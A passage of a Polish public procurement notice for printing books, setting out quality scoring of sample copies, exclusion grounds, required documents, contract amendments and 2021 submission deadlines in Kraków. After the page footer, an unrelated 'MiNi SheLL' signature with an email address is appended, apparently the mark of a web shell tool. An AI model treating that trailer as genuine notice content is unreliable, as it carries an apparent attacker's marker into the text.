kryterium jakość będzie następowała na podstawie próbki przeznaczonej do<br/>oceny jakości zgodnej z wymaganiami i wskazaniami rozdziału VIII i instrukcją zawartą w rozdziale XIX<br/>niniejszej SWZ.<br/>Ocena jakościowa próbek nastąpi wg wskazanych parametrów druku:<br/>Parametr druku	Ocena jakości parametru druku<br/>jakość wydrukowanego tekstu	<br/>9 – wykonanie wysokiej jakości : wyrazistość druku, nasycenie barwy, ostrość i czytelność czcionki, równomierność zadruku, brak smug, zamazań, przebarwień bądź bladości druku<br/><br/>5 - niewielkie uchybienia możliwe do akceptacji<br/><br/>0 – wykonanie niepoprawne<br/><br/>wydruk fotografii barwnych	<br/>9 – wykonanie wysokiej jakości: prawidłowe spasowanie kolorów: ostrość reprodukcji, równomierne nasycenie kolorów, równomierność zadruku, brak smug, zamazań, przebarwień bądź przeczernień wydruku<br/><br/>6 - niewielkie uchybienia możliwe do akceptacji <br/><br/>0 – wykonanie niepoprawne<br/><br/>wydruk okładki	<br/>8 – precyzja i estetyka wykonania, jakość zadruku: prawidłowe spasowanie kolorów, brak zamazań, równe nasycenie kolorów<br/><br/>5 – niewielkie uchybienia możliwe do akceptacji<br/><br/>0 – wykonanie niepoprawne<br/><br/>foliowanie okładki	<br/>8 – wykonanie wysokiej jakości: brak pęcherzyków powietrza, odkształceń folii na brzegach, odchodzenia folii na brzegach<br/><br/>5 - niewielkie uchybienia możliwe do akceptacji<br/><br/>0 – wykonanie niepoprawne<br/><br/>dokładność klejenia i szycia książki	<br/>8 – wykonanie poprawne: publikacja nie rozkleja się, nie wypływa nadmiar kleju spomiędzy stron, szycie wykonane precyzyjnie<br/><br/>5 - niewielkie uchybienia możliwe do akceptacji<br/><br/>0 – wykonanie niepoprawne<br/><br/>dokładność obcięcia	<br/>8 – wykonanie poprawne: gładkość i równomierność obciętych kartek, zachowanie kątów prostych w stosunku do kolumny tekstu lub zdjęcia<br/><br/>5 - niewielkie uchybienia możliwe do akceptacji<br/><br/>0 – wykonanie niepoprawne<br/>3.	Ocenę końcową oferty stanowi suma (Σ) punktów przyznanych za obydwa kryteria wymienione wyżej: <br/> Σ = C + J <br/>	<br/>gdzie: Σ - suma punktów stanowiąca ocenę końcową<br/>Wyniki zostaną zaokrąglone do dwóch miejsc po przecinku. Oferta może otrzymać maksymalnie 100 punktów <br/>4.	Jeżeli zamawiający nie podejmie decyzji o prowadzeniu negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/>6.	Za najkorzystniejszą zostanie uznana oferta niepodlegająca odrzuceniu, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów za obydwa kryteria (liczoną do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli dotyczy) oraz<br/>potwierdzenia braku podstaw do wykluczenia, z przesłanek z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5<br/>i 7 ustawy PZP - wskazanych przez Zamawiającego w rozdziale VI ust. 1 i 2 SWZ, Wykonawca załącza<br/>do oferty, aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust.1 ustawy Pzp,sporządzone na podstawie załącznika nr 4 do SWZ. 2. Podmiotowe środki dowodowe - dokumenty i<br/>oświadczenia, które Wykonawca będzie zobowiązany złożyć na wezwanie Zamawiającego - dotyczy<br/>wykonawcy, którego oferta została najwyżej oceniona: Zamawiający wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych – nie<br/>dotyczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych na potwierdzenie zgodności oferowanych usług z wymaganiami określonymi w opisie przedmiotu zamówienia związanymi z realizacją zamówienia to jest: Próbki czyli przykładowej drukowanej książki (jednego egzemplarza książki) w technice cyfrowej, o cechach i parametrach zbliżonych do parametrów opisanych w specyfikacji publikacji stanowiącej przedmiot niniejszego zamówienia publicznego (załącznik nr 1 do SWZ – opis przedmiotu zamówienia) tj. książki w oprawie miękkiej, szyto – klejonej, okładce zafoliowanej, z ilustracjami (rysunkami bądź fotografiami) czarno białymi i kolorowymi) pozwalającymi na ocenę jakości zgodnie z wymaganiami określonymi przez Zamawiającego, w rozdziale XV niniejszej SWZ, zrealizowana przez podmiot, który będzie realizował zamówienie objęte niniejszą SWZ. <br/>Przedmiot próbki ma posiadać parametry zbliżone do przedmiotu zamówienia w zakresie, o którym mowa powyżej, będzie podlegał badaniu na potwierdzenie zgodności oferowanych usług z przedmiotem zamówienia oraz będzie podlegał ocenie w ramach kryterium pozacenowego „Jakość”, zgodnie z rozdz. XV SWZ. <br/>Zamawiający zastrzega, iż próbka, stanowiąca element oferty wykonawcy, niespełniająca wymagań określonych w niniejszej SWZ (w zakresie parametrów próbki określonych powyżej), będzie stanowiła podstawę do odrzucenia oferty wykonawcy jako nieodpowiadającej treści SWZ. Niezłożenie próbki bądź złożenie takiej próbki, dla której niemożliwa będzie identyfikacja jej wytwórcy (drukarni, która zrealizowała przedłożoną próbkę) stanowiło będzie podstawę do odrzucenia oferty Wykonawcy jako nieodpowiadającej treści SWZ (próbka musi zawierać informację umieszczoną trwale w książce lub musi jej towarzyszyć dokument potwierdzający/ dowód np. nadruk w książce lub inne trwałe oznaczenie książki, załączona kopia faktury wraz z protokołem odbioru). Przedłożona do oceny próbka winna być zrealizowana przez podmiot, który będzie faktycznie realizował usługę druku publikacji w ramach niniejszego zamówienia publicznego. Sposób oceny próbek w kryterium „Jakość” zostały opisany został w rozdziale XV SWZ. <br/>Wymaganą, badaną i ocenianą przez Zamawiającego w przedmiotowym postępowaniu próbkę, o której mowa w niniejszej SWZ należy złożyć, na mocy postanowień art. 65 ust. 2 ustawy Pzp, w postaci drukowanej jednej książki wraz z pismem przewodnim opatrzonym własnoręcznym podpisem osoby upoważnionej ze strony Wykonawcy, oznaczyć zgodnie z instrukcją podaną w rozdziale XIX niniejszej SWZ oraz złożyć z zachowaniem nieprzekraczalnego terminu wyznaczonego na składanie ofert w niniejszym postępowaniu. Złożenie próbki do oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 – Prawo pocztowe (tekst jednolity Dz.U. z 2020 poz. 1041 ze zmianami), osobiście lub za pośrednictwem posłańca. Zamawiający nie będzie wzywał do złożenia lub uzupełnienia przedmiotowych środków dowodowych – próbki - służącej ocenie ofert w kryterium „Jakość” <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta winna zawierać: 1) Formularz OFERTY sporządzony według załączonego wzoru, który<br/>stanowi załącznik nr 2 do SWZ 2) oświadczenie Wykonawcy, o którym mowa w Rozdziale VII pkt<br/>1 SWZ - wg załącznika nr 4 do SWZ – potwierdzające brak podstaw wykluczenia. Jeżeli dotyczy<br/>– również oświadczenia każdego z Wykonawców spośród Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia - w zakresie potwierdzenia braku podstaw wykluczenia Wykonawcy,<br/>3)dokumenty, z których wynika prawo do podpisania oferty. Zgodnie z § 13 ust. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii - w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana<br/>do jego reprezentowania, zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru. Jeśli umocowanie osoby składającej ofertę nie wynika z dokumentów<br/>rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien<br/>dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do<br/>złożenia oferty lub do złożenia oferty i podpisania umowy, 4) próbkę do oceny jakości złożoną<br/>odrębnie- zgodnie z wymaganiami i wskazaniami określonymi w rozdziale VIII SWZ –<br/>przedmiotowe środki dowodowe oraz instrukcją zawartą w rozdziale XIX pkt 4 (odstąpienie w<br/>tym zakresie od formy elektronicznej) 5) oświadczenia i/lub dokumenty na podstawie których,<br/>Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie,<br/>stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji (jeżeli Wykonawca zastrzega takie informacje).W przypadku oferty składanej przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka<br/>cywilna), do oferty powinno również zostać załączone:1) pełnomocnictwo dla ustanowionego<br/>pełnomocnika do reprezentowania ich w postępowaniu, uprawniające do złożenia oferty w ich<br/>imieniu. Pełnomocnictwo załączone do oferty, powinno zawierać w szczególności: a) wskazanie<br/>postępowania o zamówienie publiczne, którego dotyczy, b) mocodawców tj. wszystkich<br/>Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z<br/>określeniem adresu siedziby, c) osobę ustanowionego pełnomocnika d) jednoznacznie<br/>wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres<br/>umocowania) Podpisy na pełnomocnictwie muszą zostać złożone przez osoby uprawnione do<br/>składania oświadczeń woli, wymienione we właściwym rejestrze.2) oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy (dotyczy Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia w przypadku, o którym mowa w art. 117 ust. 3 ustawy<br/>Pzp) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Dokument<br/>potwierdzający ustanowienie pełnomocnika musi być podpisany przez wszystkich Wykonawców<br/>ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby<br/>uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze.<br/>2. Spółkę cywilną należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za realizację umowy.<br/>4. Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania, zatem Zamawiający będzie sprawdzać, czy nie zachodzą, wobec<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podstawy<br/>wykluczenia, o których mowa w art. 108 ust.1 i art. 109 ust. 1 pkt 4),5) i 7) ustawy Pzp. 5. Wobec powyższego, oświadczenie o którym mowa w rozdz. VII pkt 1 składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania 455 oraz z uwzględnieniem zapisów art. 454 ustawy Prawo zamówień publicznych.2. Zamawiający,<br/>działając zgodnie z art. 455 ust. 1, dopuszcza również możliwość zmianyumowy, bez<br/>przeprowadzenia nowego postępowania, w następujących okolicznościach i wzakresie:1)<br/>zmiany wysokości wynagrodzenia Wykonawcy w przypadku zmiany ustawowej zmiany<br/>stawki podatku VAT – wynagrodzenie Wykonawcy określone w umowie zostanie zmienione<br/>z uwzględnieniem nowej stawki podatku VAT. Zmiana wysokości wynagrodzenia<br/>należnego Wykonawcy będzie odnosić się wyłącznie do części przedmiotu umowy zrealizowanej<br/>zgodnie z terminami ustalonymi w umowie, po dniu wejścia w życie przepisów zmieniających<br/>stawkę podatku od towarów i usług oraz wyłącznie do części przedmiotu umowy, do<br/>której zastosowanie znajdzie zmiana stawki podatku od towarów i usług. Wartość wynagrodzenia<br/>netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie<br/>nowychprzepisów2) gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę w<br/>wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia,<br/>połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki<br/>udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to<br/>za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów<br/>ustawy,3) zmiany terminu realizacji przedmiotu umowy: w sytuacji gdy w czasie trwania umowy<br/>z przyczyn niezawinionych przez Wykonawcę nastąpi konieczność zmiany terminu<br/>realizacji przedmiotu umowy. Zmiana nie może spowodować zmiany ceny wynikającej z<br/>oferty Wykonawcy. Zmiana może dotyczyć terminu wykonania umowy bez naliczania kar<br/>umownych;4) zmiany odpowiednich zapisów umowy, w sytuacji gdy w czasie trwania umowy<br/>wystąpią zdarzenia siły wyższej rozumianej jako zewnętrzne, nieprzewidziane zdarzenia<br/>pozostające poza kontrolą Stron, w szczególności wojny i innego działania o charakterze<br/>zbrojnym, działania siły przyrody, akty terroru, zamieszki, rozruchy, strajki i inne działania<br/>zagrażające porządkowi publicznemu, decyzje lub działania władz publicznych, a także klęski<br/>żywiołowe, niemożliwych do przewidzenia i zapobieżenia, których nie dało się uniknąć nawet<br/>przy zachowaniu najwyższej staranności, a które uniemożliwią Wykonawcy wykonanie jego<br/>zobowiązania w części lubcałości,5) odpowiednich zapisów umowy, w sytuacji gdy w czasie<br/>trwania umowy konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego<br/>(wyłącznie w zakresie wynikającym ze zmian prawa); 6) powierzenia określonego zakresu<br/>podwykonawcy lub zmiany zakresu części prac powierzonych podwykonawcy w przypadku, gdy<br/>wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia3.<br/>Strony dopuszczają ponadto zmiany treści umowy w zakresie zmiany sposobu<br/>wykonania przedmiotu umowy lub zmiany terminu wykonania, w okresie stanu zagrożenia<br/>epidemicznego lub stanu epidemii ogłoszonego z powodu COVID-19 i innych chorób zakaźnych<br/>oraz wywołanymi nimi sytuacjami kryzysowymi, które szczegółowo zostały opisane w paragrafie 10 projektowanych postanowień umowy - załącznik nr 3 do SWZ. Inicjatorem zmian może być<br/>Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające opis proponowanych zmian i ich uzasadnienie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-30 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/asp_krakow - oferta, a w zakresie próbki do oceny jakości na adres: 31-157 Kraków, Plac Matejki 13 Biuro Zamówień Publicznych I piętro pokój 113</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-30 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com